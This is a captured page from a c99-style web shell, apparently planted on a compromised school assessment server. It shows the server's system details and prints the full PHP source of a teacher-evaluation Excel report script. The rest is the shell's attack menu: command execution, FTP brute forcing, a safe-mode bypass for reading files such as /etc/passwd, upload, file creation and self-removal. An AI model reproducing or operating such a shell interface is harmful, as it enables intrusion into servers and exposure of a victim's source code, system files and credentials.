!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/eassess/teacher/   drwxr-xr-x
Free 52.32 GB of 127.8 GB (40.94%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     reportDataRQp2_excel.php (23.67 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?
header
('Content-type: application/xls');
header('Content-Disposition: attachment; filename="testing1.xls"');

include_once 
"../../class/clsDB.php";
include_once 
"../../class/clsConnection.php";
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../class/clsReg_SysSemesterDes.php";
include_once 
"../class/clsReg_Program.php";
include_once 
"../class/clsRegistration.php";
include_once 
"../class/clsCourseAssess.php";
include_once 
"../class/clsHoldCourse.php";
include_once 
"../class/clsClassAssess.php";
include_once 
"../class/clsClassOpenForAssess.php";
include_once 
"../class/clsClassInStructorAssess.php";
include_once 
"../class/clsOfficerAssess.php";
include_once 
"../class/clsDefineAssessment.php";
include_once 
"../class/clsAssessForm.php";
include_once 
"../class/clsDoAssessment.php";
include_once 
"../class/clsResultRQ.php";
include_once 
"../class/clsSectionAll.php";
include_once 
"../class/clsSectionRQ.php";
include_once 
"../class/clsHeaderQuestion.php";
include_once 
"../class/clsHeaderScore.php";
include_once 
"../class/clsDetailScore.php";
include_once 
"../class/clsRadioQuestion.php";
include_once 
"../class/clsSectionAll.php";
include_once 
"../class/clsOfficerAssess.php";
include_once 
"../class/clsTimeTableAssess.php";

$oCR = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_REG'], $GLOBALS['USER_REG'], $GLOBALS['PASSWORD_REG']);

$oCA = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB_EASS'], $GLOBALS['USER_EASS'], $GLOBALS['PASSWORD_EASS']);

$oReg = new Registration($oCA);
$oCourse = new CourseAssess($oCA);
$oClass = new ClassAssess($oCA);
$oClsOpen = new ClassOpenForAssess($oCA);
$oCIS = new ClassInStructorAssess($oCA);
$oOFA = new OfficerAssess($oCA);
$oHC = new HoldCourse($oCA);
$oAF = new AssessForm($oCA);
$oDo = new DoAssessment($oCA);
$oOFA = new OfficerAssess($oCA);
$oTTA=new TimeTableAssess($oCA);

$oCourse->SearchByKey($courseId);
$oCourse->GetRecord();
$oClass->SearchByKey($classId);
$oClass->GetRecord();        

$oProg = new Program($oCR);
set_time_limit(0);
$numAllCourseReg=0;
$numAllCourseReg $oReg->CTByAcYSeClassIdCoId($acadYear,$semester,$classId,$courseId);
$numAllDo=$numAllCourseReg;
        
// หลายสัปดาห์
        
if($officerId != && $ttId==0){
            
$week=0;
            
$oTTA->RSJoinHCByDefineidClIdOfId($defineid,$classId,$officerId);
            while(
$oTTA->GetRecord()){
                
$week++;
            }
            
$numAllDo=$numAllCourseReg*$week;
        }
$numCourseDoAss 0;
if(
$ttId==0){
    
$numCourseDoAss=$oDo->CountDoidByDefineIdCourseIdClassIdOfficerid($defineid,$courseId,$classId,$officerId);
}else{
    
$numCourseDoAss=$oDo->CountDistinctStdByDefineidOfficeridClassIdttId($defineid,$officerId,$classId,$ttId);
}
$oAF->RSAssessFormByAssid($assid);
$oAF->GetRecord();

$oSse = new SysSemesterDes($oCR);
$oSse->SearchByKey($semester);
$oSse->GetRecord();

$oDA = new DefineAssessment($oCA);
$oDA->SearchByDefineid($defineid);
$oDA->GetRecord();

//ค้นหาคำถามปลายเปิดในแบบประเมินนี้ sectionTQid = 1
$oSA = new SectionAll($oCA);
$CntSRQid $oSA->RSCountSectionRQid($assid);

$oRRQ = new ResultRQ($oCA);
?>
<title>รายงานผลประเมินจำแนกตามหัวข้อการประเมิน (เฉพาะคำถามปลายปิด)</title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<div id="tabmargin"><form name="pc" method="post" action="<?php echo $PHP_SELF;?>" enctype="multipart/form-data"><br>
<table width="95%" align="center" border="0">
    <tr>    
        <td>
        <table width="100%" align="center"  cellpadding="1" cellspacing="1">
            <tr> 
              <td height="26" align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
              <td align="center">&nbsp;</td>
            </tr>
            <tr> 
              <td height="22" colspan="24"><font size="3"><b>รายงานผลประเมินจำแนกตามหัวข้อการประเมิน (เฉพาะคำถามปลายปิด)</b></font></td>
            </tr>
            <tr> 
              <td height="22" colspan="24" align="center">&nbsp;</td>
            </tr>
            <tr> 
              <td height="22" colspan="24">&nbsp;</td>
            </tr>
            <tr>
              <td height="22" colspan="24"><font size="2"><b>ชื่อทางการแบบประเมิน 
                </b></font><font size="2"><b>&nbsp;&nbsp;&nbsp; : </b></font><font size="2"><? if($oAF->maintopic == ""){ echo "-"; }else{ echo $oAF->maintopic; } ?>
                </font></td>
            </tr>
            <tr> 
              <td height="22" colspan="24"><font size="2"><b>ชื่อทั่วไปแบบประเมิน 
                </b></font><font size="2"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: 
                </b><? echo $oAF->nameAss?><b> </b></font></td>
            </tr>
            <tr> 
              <td height="22" colspan="24"><font size="2"><b>ปีการศึกษา </b></font><font size="2"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: 
                </b></font><? echo $acadYear ?> / <? echo $oSse->semesterName;?>              </td>
            </tr>
            <tr> 
              <td height="22" colspan="24"  <? if(($oClass->programId == 0) || ($oClass->programId == "")){ echo "valign=\"baseline\""; } ?>><font size="2"><b>หลักสูตร</b></font><font size="2"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
                : </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                <? if(($oClass->programId == 0) || ($oClass->programId == "")){
                            
$z 0;
                            
$oClsOpen->SearchByClassId($oClass->classId);
                            while(
$oClsOpen->GetRecord()){
                                
$oProg->SearchByKey($oClsOpen->programId);
                                
$oProg->GetRecord();
                                
$arrCls[$z] = $oProg->programName;
                                
$z++;
                            } 
// end while oClsOpen
                            
for($a=0;$a<=$z;$a++){
                                echo 
$arrCls[$a];
                                if(
$a $z-1) echo ",<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
                            }
                        }else{
                            
$oProg->SearchByKey($oClass->programId);
                            
$oProg->GetRecord();
                            echo 
$oProg->programName;
                        }
                
?>
                </font></td>
            </tr>
            <tr> 
              <td height="22" colspan="24"><font size="2"><b>รหัสรายวิชา&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</b></font><font size="2"><b>: 
                </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oCourse->courseCode?> 
                (<?php echo $oCourse->courseCodeEng?>)</font></td>
            </tr>
            <tr> 
              <td height="22" colspan="24"><font size="2"><b>ชื่อรายวิชา&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</b></font><font size="2"><b>: 
                </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><?php echo $oCourse->courseName?></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                (<?php echo $oCourse->courseNameEng?>)</font></td>
            </tr>
            <tr> 
              <td height="22" colspan="24"><font size="2"><b>ช่วงเวลาประเมิน&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</b></font><font size="2"><b>: 
                </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><? echo abbreDate(splitDateDb2($oDA->startDate,'/')); ?> 
                - <? echo abbreDate(splitDateDb2($oDA->endDate,'/'));  ?>  
                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 
                <b>ชั้นปี :</b> <?php echo $oClass->studentYear?>&nbsp; &nbsp;
                <b>กลุ่ม :</b> <?php echo $oClass->section?>
                </font></td>
            </tr>
            <tr> 
              <? if($officerId == 0) {?><td height="22" colspan="24"> <? }else{?><td height="22" colspan="2"> <? ?> 
              <font size="2"><b>ประเมินอาจารย์</b></font><font size="2"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;: 
                </b></font><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"> 
                <?php if($officerId == ""){ ?>
                <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"><? echo "- ไม่พบรายชื่ออาจารย์ผู้สอน -"?></font> 
                <? }else if($officerId == 0){
                                        
$t=0;
                                        
$oCIS->SearchByClassIdGroupClassIdOfficerId($classId);
                                        while(
$oCIS->GetRecord()){
                                            
$oOFA->SearchByKey($oCIS->officerId);
                                            
$oOFA->GetRecord();
                                            
$Teachers[$t] = "อ.".$oOFA->officerName." ".$oOFA->officerSurname;
                                            
$t++;
                                        }
                                        
                                        for(
$s=0;$s<$t;$s++){        
                                            echo 
$Teachers[$s];
                                            if(
$s<$t-1){
                                                echo 
",&nbsp;&nbsp;";
                                            }
                                        }
                                  }else{ 
                                    
$oOFA->SearchByKey($officerId);
                                    
$oOFA->GetRecord();
                                    echo 
$oOFA->prefixName.$oOFA->officerName."&nbsp;&nbsp;".$oOFA->officerSurname
                                  } 
?>
                </font>
                </td> <? if($oDA->flag==7){ ?><td height="22" colspan="22">
                <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><b> สัปดาห์ที่ : </b>
                <? if($ttId!=0){
                        
$oTTA->SearchTimeTableByttId($ttId);
                        
$oTTA->GetRecord();
                         echo 
$oTTA->ttWdAcYWeekNo;
                    }else{
                        
$i=0;
                        
$oTTA->RSJoinHCByDefineidClIdOfId($defineid,$classId,$officerId);
                        while(
$oTTA->GetRecord()){
                            if(
$i>=1)
                                echo 
" , " ;
                            echo 
$oTTA->ttWdAcYWeekNo;
                            
$i=$i+1;
                        }
                    } 
?>
                </font>                </td><? ?>
            </tr>
            <tr> 
              <td height="22" colspan="2"><font size="2"><b>นักศึกษาที่ลงทะเบียน&nbsp; 
                : </b><?=$numAllCourseReg ?>&nbsp;คน
                </font></td><td height="22" colspan="22"><font size="2">
                <? if($oDA->flag==7) {?>
                            <b> ประเมิน : </b>
                    <? if($ttId!=0) echo '1'; else echo $i;    ?> &nbsp; สัปดาห์ 
                <? }?>
                </font></td>
            </tr>
            <? if($oDA->flag==7) {?>
            <tr> 
              <td height="22" colspan="2"><font size="2"><b>จำนวนครั้งที่ต้องประเมิน 
                : </b></font><font size="2"> <?=$numAllDo?> &nbsp;ครั้ง 
                </font></td><td height="22" colspan="22"><font size="2"><b>จำนวนครั้งที่เข้ามาประเมิน  
                : </b></font><font size="2"> 
                <? echo $numCourseDoAss ?> &nbsp;ครั้ง
                </font></td>
            </tr>
            <? }?>
             <tr> 
              <td height="22" colspan="2">
              <? if($oDA->flag==7) {?>    &nbsp;
             <? }else{ ?>
              <font size="2"><b>นักศึกษาที่เข้าประเมิน
                : </b></font><font size="2"> <? echo $numCourseDoAss?> &nbsp;คน </font>
                <? $numAllDo=$numAllCourseReg; }?>
                </td><td height="22" colspan="22">
                <font size="2"><b>ร้อยละเฉลี่ยการเข้ามาประเมิน  
                : </b></font><font size="2"> 
                <? $percentDo = ($numCourseDoAss/$numAllDo)*100;  printf ("%.2f",$percentDo);?> 
                </font></td>
            </tr>
          </table>
<?
        
if($CntSRQid  0){ 
            
$oSA = new SectionAll($oCA);
            
$numSection$oSA->RSCountSectionAll($assid);
            
$oSA->RSByKeyAss($assid);
            
$i 1;
            
$indexSection 1;
            while (
$oSA->GetRecord()){
                
/*---------------- กรณีที่เลือกเป็นคำถามชนิดปลายปิด------------------*/
                
if($oSA->sectionRQid != '0'){
                    
//สร้าง oSRQ แสดงหัวข้อของส่วนการประเมิน
                    
$oSRQ = new SectionRQ($oCA);
                    
$oSRQ->RSSectionRQAll($assid,$oSA->sectionRQid);
                    while(
$oSRQ->GetRecord()){
                        
$oHQ = new HeaderQuestion($oCA);
                        
$oHQ->RSHeaderAllBySection($assid,$oSA->sectionRQid);
                        
$oHQ->GetRecord();                
                        
$oHS = new HeaderScore($oCA);
                        
$oHS->RSHeadSAll($oHQ->HSid);
                        
$oHS->GetRecord();
?>
        <table width="100%">
            <tr> 
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
                <td  valign="top">&nbsp;</td>
            </tr>
            <tr> 
                <td colspan="18"  valign="top"><font size="2"><span class = "fontMarkTD1"> 
                <? if($numSection == '1') { echo "คำอธิบาย"; } else { echo "ส่วนที่ ".$indexSection; }?>
                </span> : </font><font size="2"><? echo $oSRQ->topicSectionRQ ?></font></td>
            </tr>
        </table>
        <table width="100%" border="1">
            <tr bgcolor="#CFCFCF"> 
                <td width="68%" rowspan="3" align="center"><font size="2"><b>หัวข้อการประเมิน</b></font></td>
                <td width="16%" colspan="<? echo $oHS->score_amount*2 ?>" align="center"><font size="2"><b>  คะแนนการประเมิน </b></font></td>
                <td width="6%" align="center" rowspan="3"><font size="2"><b>ค่าเฉลี่ย</b></font></td>
                <td width="6%" align="center" rowspan="3"><font size="2"><b>S.D.</b></font></td>
            </tr>
            <tr> 
<?
                $ch 
0;
                
$oDS = new DetailScore($oCA);
                
$oDS->RSDetailSAll($oHS->HSid);
                while(
$oDS->GetRecord()){  
                    if(
$ch==0)
                        
$full $oDS->CTLast;
                    
$ch++;
?>
                <td height="23" colspan="2" align="center" bgcolor="#CFCFCF"><font size="2"><b><? echo $oDS->score ?> </b></font></td>
<?
                
}
?>
            </tr>
            <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_7"];?>"> 
<?
                
for($i=0;$i<$oHS->score_amount;$i++){
?>
                <td height="22" align="center" bgcolor="#CFCFCF"><font size="2"><font size="2"><b>จำนวน</b></font></font></td>
                <td width="4%" height="22" align="center" bgcolor="#CFCFCF"><font size="2">&nbsp;&nbsp;&nbsp;<b>%</b>&nbsp;&nbsp;&nbsp;</font></td>
<?
                
}
?>
            </tr>
<?
            $index1 
1$index2 1;
            
$index_color1 1$index_color2 1;
            
$CntSubQ 0$xbar 0;  $sd 0;
            
/*--------------------------------------------------------- คำนวนส่วนของคำถามข้อหลัก -------------------------------------------------------*/
            
$oRQ = new RadioQuestion($oCA);
            
$oRQ->RSRadioQByKey($assid,$oSA->sectionRQid,1);
            while(
$oRQ->GetRecord()){
                
$oCntRQ = new RadioQuestion($oCA);
                
$CntSubQ $oCntRQ->RSCountSubRQid($assid,$oRQ->RQid,'2');
                
                if(
$index_color2%== 0){//EEF2FB
                    
if($index_color1%== 0){
                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                    }else{
                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                    }
                }else{
                    if(
$index_color1%== 0){
                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                    }else{
                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                    }
                }
?>
                <td><font size="2"><? echo $index1."." ?> <? echo $oRQ->nameRQ ?></font>
                <? if($oRQ->subtract == -1) { ?><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_7"]; ?>"> * </font> <? ?>
                </td>
<?
                
if($oRQ->subtract == -1){
                    
$oDS->RSDetailSAllDESC($oHS->HSid);
                }else{
                    
$oDS->RSDetailSAll($oHS->HSid);
                }
                while(
$oDS->GetRecord()){  
                    if(
$ttId==0){
                        
$countPointRQ $oRRQ->CountPointJoinByRQidDefineidOfficerIdClassIdPointCo($oRQ->RQid,$defineid,$officerId,$classId,$oDS->score,$courseId);
                    }else{
                        
$countPointRQ $oRRQ->CountPointJoinByRQidDefineidOfficerIdClassIdPointTtId($oRQ->RQid,$defineid,$officerId,$classId,$oDS->score,$ttId);
                    }
                    
$AvgCountPointRQ = ($countPointRQ/$numCourseDoAss)*100;
?>
                <td align="center">
                <? if(($CntSubQ == 0)&&($numCourseDoAss '0')) echo $countPointRQ ?>
                <? if(($CntSubQ == '0')&&($numCourseDoAss == '0')) echo "-"?>
                </td>
                <td align="center"><font size="2">
                <? if(($CntSubQ == 0)&&($numCourseDoAss '0')) printf ("%.2f",$AvgCountPointRQ); ?>
                <? if(($CntSubQ == '0')&&($numCourseDoAss == '0')) echo "-"?>
                </font></td>
<?
                
// end while oDS
                
                
if($CntSubQ == 0){    
                    
//คิดค่าเฉลี่ยและค่า sd ของคำถามข้อหลัก 
                        
if($ttId==0)
                                
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidCo($full,$acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$oRQ->RQid,$courseId);
                        else
                                
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidttId($full,$acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$oRQ->RQid,$ttId);
                    if(
$oRRQ->GetRecord()){
                        
$xbar $oRRQ->xbar;
                        
$sd $oRRQ->sd;
                    }
                }
?>
                <td align="center"> 
                <? if($xbar != 0) echo substr($xbar,0,4);?>
                <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                </td>
                <td align="center">
                <? if($xbar != 0)  echo number_format($sd,2); ?>
                <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                </td>
            </tr>
<?  /*--------------------------------------------------------- คำนวนส่วนของคำถามข้อย่อย-------------------------------------------------------*/
                
$xbarSub 0;  $sdSub 0;
                
$sumXbarSub 0;
                
$sumSDSub 0;
                
$ocRQ = new RadioQuestion($oCA);
                
$ocRQ->RSCheckLevel($assid,$oRQ->RQid);
                while(
$ocRQ->GetRecord()){                
                    if(
$index_color1%== 0){//EEF2FB
                        
if($index_color2%== 0){
                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                        }else{
                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                        }
                    }else{
                        if(
$index_color2%== 0){
                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                        }else{
                            echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                        }
                    }
?>
                <td><? echo "&nbsp;&nbsp;&nbsp;&nbsp;".$index1.".".$index2 ?>
                <? echo $ocRQ->nameRQ ?>
                <? if($ocRQ->subtract == -1) { ?><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_7"]; ?>"> * </font> <? ?>
                </td>
<?
                    
if($ocRQ->subtract == -1){
                        
$oDS->RSDetailSAllDESC($oHS->HSid);
                    }else{
                        
$oDS->RSDetailSAll($oHS->HSid);
                    }
                    while(
$oDS->GetRecord()){  
                    
//    $countPointRQ = $oRRQ->CountPointJoinByRQidDefineidOfficerIdClassIdPoint($ocRQ->RQid,$defineid,$officerId,$classId,$oDS->score);
                        
if($ttId==0){
                            
$countPointRQ $oRRQ->CountPointJoinByRQidDefineidOfficerIdClassIdPointCo($ocRQ->RQid,$defineid,$officerId,$classId,$oDS->score,$courseId);
                        }else{
                            
$countPointRQ $oRRQ->CountPointJoinByRQidDefineidOfficerIdClassIdPointTtId($ocRQ->RQid,$defineid,$officerId,$classId,$oDS->score,$ttId);
                        }
                        
$AvgCountPointRQ = ($countPointRQ/$numCourseDoAss)*100;
?>                 
                <td align="center"><? if($numCourseDoAss '0') echo $countPointRQ ?>
                <? if($numCourseDoAss == '0') echo "-"?>
                </td>
                <td align="center"><font size="2"><? if($numCourseDoAss '0'printf ("%.2f",$AvgCountPointRQ); ?> 
                <? if($numCourseDoAss == '0') echo "-"?>
                </font></td>
<?
                    
}    // end while oDS
                    
                    //คิดค่าเฉลี่ยและค่า sd ขอคำถามข้อย่อย
            //        $oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQid($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ocRQ->RQid);
                            
if($ttId==0)
                                
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidCo($full,$acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ocRQ->RQid,$courseId);
                            else
                                
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidttId($full,$acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ocRQ->RQid,$ttId);
                    if(
$oRRQ->GetRecord()){
                        
$xbarSub $oRRQ->xbar;
                        
$sdSub $oRRQ->sd;
                        
$sumXbarSub += $oRRQ->xbar;
                        
$sumSDSub += $oRRQ->sd;
                    }
?>
                <td align="center"> 
                <? if($xbarSub != 0) echo substr($xbarSub04); ?>
                <? if($numCourseDoAss == '0') echo "-"?>
                </td>
                <td align="center"> 
                <? if($xbarSub != 0) echo number_format($sdSub,2);?>
                <? if($numCourseDoAss == '0') echo "-"?>
                </td>
            </tr>
<?
                    $index2
++;
                    
$index_color2++;    
                } 
//end while ocRQ    
                
$index1++;
                
$index2 1;
                
$index_color1++;
                
                if(
$CntSubQ) {
?>
            <tr bgcolor="#CFCFCF">
                <td height="22" align="center"><font size="2"><b>รวม</b></font></td>
<?php
                    
for($col=0$col<$oDS->GetRowSelected(); $col++) {
?>
                <td></td>
                <td></td>
<?php
                    
}
?>
                <td align="center"><font size="2"><b><?php echo substr($sumXbarSub/$CntSubQ0,4); ?></b></font></td>
                <td align="center"><font size="2"><b><?php echo number_format($sumSDSub/$CntSubQ2);?></b></font></td>
            </tr>
<?php
                
}
            } 
//end while oRQ
?>
            <tr bgcolor="#CFCFCF">
                <td height="22" align="center"><font size="2"><b>ภาพรวม</b></font></td>
<?php
                
for($col=0$col<$oDS->GetRowSelected(); $col++) {
?>
                <td></td>
                <td></td>
<?php
                
}
                
                if(
$ttId==0)
                    
$oRRQ->SearchResultIXbarSDByAcadSemDefineidOfficerIdClassIdSectionRQidCo($full,$acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$courseId);
                else
                    
$oRRQ->SearchResultIXbarSDByAcadSemDefineidOfficerIdClassIdSectionRQidttId($full,$acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ttId);
                
$oRRQ->GetRecord();
?>
                <td align="center"><font size="2"><b><?php echo substr($oRRQ->xbar04); ?></b></font></td>
                <td align="center"><font size="2"><b><?php echo number_format($oRRQ->sd2);?></b></font></td>
            </tr>
        </table><br>
<?
                    
//end while oSRQ
                
// end if oSA
                
$indexSection++;
            } 
//end while oSA 
?>
        <table width="100%" border="0" align="center">
            <tr> 
                <td colspan="17"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_5"];?>"><b>หมายเหตุ 
                :</b>&nbsp; * หมายถึงเป็นคำถามเชิงลบ โดยกรณีที่เป็นคำถามเชิงลบในข้อนั้นๆ 
                ค่าเฉลี่ยและค่า S.D. จะคำนวณโดยกลับค่าให้แล้ว </font><font size="2">&nbsp;</font></td>
            </tr>
            <tr> 
                <td height="24">&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
                <td>&nbsp;</td>
            </tr>
        </table>
<?
        
} else {
?>
        <table width="100%">
            <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_5'];?>">     
                <td align="center"> <font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>">** ไม่พบข้อมูลเนื่องจากแบบประเมินที่สร้างไม่มีส่วนของคำถามปลายปิด **</font></td>
            </tr>
        </table>
<?
        
}
        
set_time_limit(30);
?>
        </td>
    </tr>
</table>
</form><br></div>
</body>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0158 ]--